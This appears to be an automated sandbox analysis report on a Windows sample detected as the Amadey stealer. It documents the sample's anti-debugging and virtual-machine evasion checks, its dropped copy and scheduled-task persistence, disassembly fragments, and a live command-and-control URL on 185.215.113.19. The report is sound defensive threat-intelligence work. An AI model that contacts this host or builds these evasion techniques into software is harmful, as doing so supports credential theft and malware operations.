Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D09AA second address: 56D09FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6DEDEB4Ah 0x00000008 mov edi, 7AA77216h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FF3408102FCh 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FF340810300h 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF340810300h 0x00000022 push eax 0x00000023 jmp 00007FF3408102FBh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D09FA second address: 56D0A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A4C second address: 56D0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A52 second address: 56D0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A56 second address: 56D0A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3408102FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A6B second address: 56D0AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF34080AB11h 0x00000009 add ecx, 5D1B2BA6h 0x0000000f jmp 00007FF34080AB11h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FF34080AB0Ah 0x00000020 mov esp, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0AB0 second address: 56D0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0AB4 second address: 56D0AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0C9C second address: 56E0D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810306h 0x0000000f push eax 0x00000010 jmp 00007FF3408102FBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF340810306h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ecx, 607BC2CDh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FF340810308h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0D07 second address: 56E0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF34080AB17h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0D38 second address: 56E0D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E09BE second address: 56E09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E09C3 second address: 56E09F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF340810307h 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: D9EAC1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: F4CDBA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: F759FE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 6FEAC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 8ACDBA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 8D59FE instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Code function: 0_2_05750D23 rdtsc

0_2_05750D23

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1239	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 430	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1294	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1276	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7804	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780	Thread sleep count: 1239 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780	Thread sleep time: -2479239s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep count: 430 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep time: -12900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7880	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776	Thread sleep count: 1294 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776	Thread sleep time: -2589294s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788	Thread sleep count: 1276 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788	Thread sleep time: -2553276s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU+vE
Source: 11NdzR12PS.exe, 00000000.00000002.1706850524.0000000000F29000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1730187640.0000000000889000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\11NdzR12PS.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Code function: 0_2_05750D23 rdtsc

0_2_05750D23

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006C645B mov eax, dword ptr fs:[00000030h]		5_2_006C645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006CA1C2 mov eax, dword ptr fs:[00000030h]		5_2_006CA1C2

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Jump to behavior

Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_006AD312 cpuid

5_2_006AD312

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_006ACB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

5_2_006ACB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.explorti.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.explorti.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.11NdzR12PS.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2279106197.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1665922474.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1689349106.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1730077217.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706599443.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
11NdzR12PS.exe	53%	Virustotal		Browse
11NdzR12PS.exe	100%	Avira	TR/Crypt.TPM.Gen
11NdzR12PS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	53%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://185.215.113.19/Vi9leo/index.phpeb8a7	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.phpC:	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php6	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php4	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpm32	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpWindows	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php6	18%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpsM	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpon	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php?	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpm32	3%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.php	2%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpH	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpon	18%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpoft	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phprosoft	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpH	3%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php4	explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpC:	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php6	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpeb8a7	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpWindows	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpm32	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpsM	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpon	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php?	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpH	explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpoft	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phprosoft	explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483371
Start date and time:	2024-07-27 04:48:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	11NdzR12PS.exe renamed because original name is a hash value
Original Sample Name:	291a8d56e77cb07be1a6b4308d51650b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/3@0/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 11NdzR12PS.exe, PID 6740 because it is empty
Execution Graph export aborted for target explorti.exe, PID 5744 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:49:01	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
22:50:02	API Interceptor	86457x Sleep call for process: explorti.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.19	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	LbMTyCFRzs.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\11NdzR12PS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1921536
Entropy (8bit):	7.955496476230148
Encrypted:	false
SSDEEP:	49152:N4T6hIyXZjUqy6rCPkriwTB3/4z/vVaHAZT:+T6hI9DQi64z/vs
MD5:	291A8D56E77CB07BE1A6B4308D51650B
SHA1:	310E47B223740DE2989F5C8F4B12D294E6568A2C
SHA-256:	FDA0FC105FFD6FAAE12D08C243FE684BE8C69696BD654D733F5CAF487B59BAAE
SHA-512:	7F764A84720DDD1B2792747797BEFB2272EB33DC4CE141C78BEF87356E7C861451588678E2A041084DB3B96A8A23B191D864F93E66F8FFEFE368FBB494F0165D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 53%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f............................. L...........@..........................PL.....w.....@.................................W...k...........................`.L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... . +.........................@...wokugkrf.@....1..8..................@...csqdmnjl......L......*..............@....taggant.0... L.."...0..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\11NdzR12PS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\11NdzR12PS.exe
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	3.3693605559613005
Encrypted:	false
SSDEEP:	6:r4jVX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0l1Xft0:kt4RKQ1cag7jzvYRQV1Pt0
MD5:	D2A5572BA2CD14B640C772350C2F3B4E
SHA1:	E5197A742B323C15E67EA7D615580F93CA3D2E0D
SHA-256:	47619FCB3E0BEBAE3ACD096EC057804B25847245E64FA029AEE74E9C976B8748
SHA-512:	0226615ECE7CA9A66217B61380959A616A46537DC0F45BE8DA5A82BEC78E0C075883CB14A4C54206B5A24D9977663E9D9CA5960E5AA717D52377FF4C684D8DD7
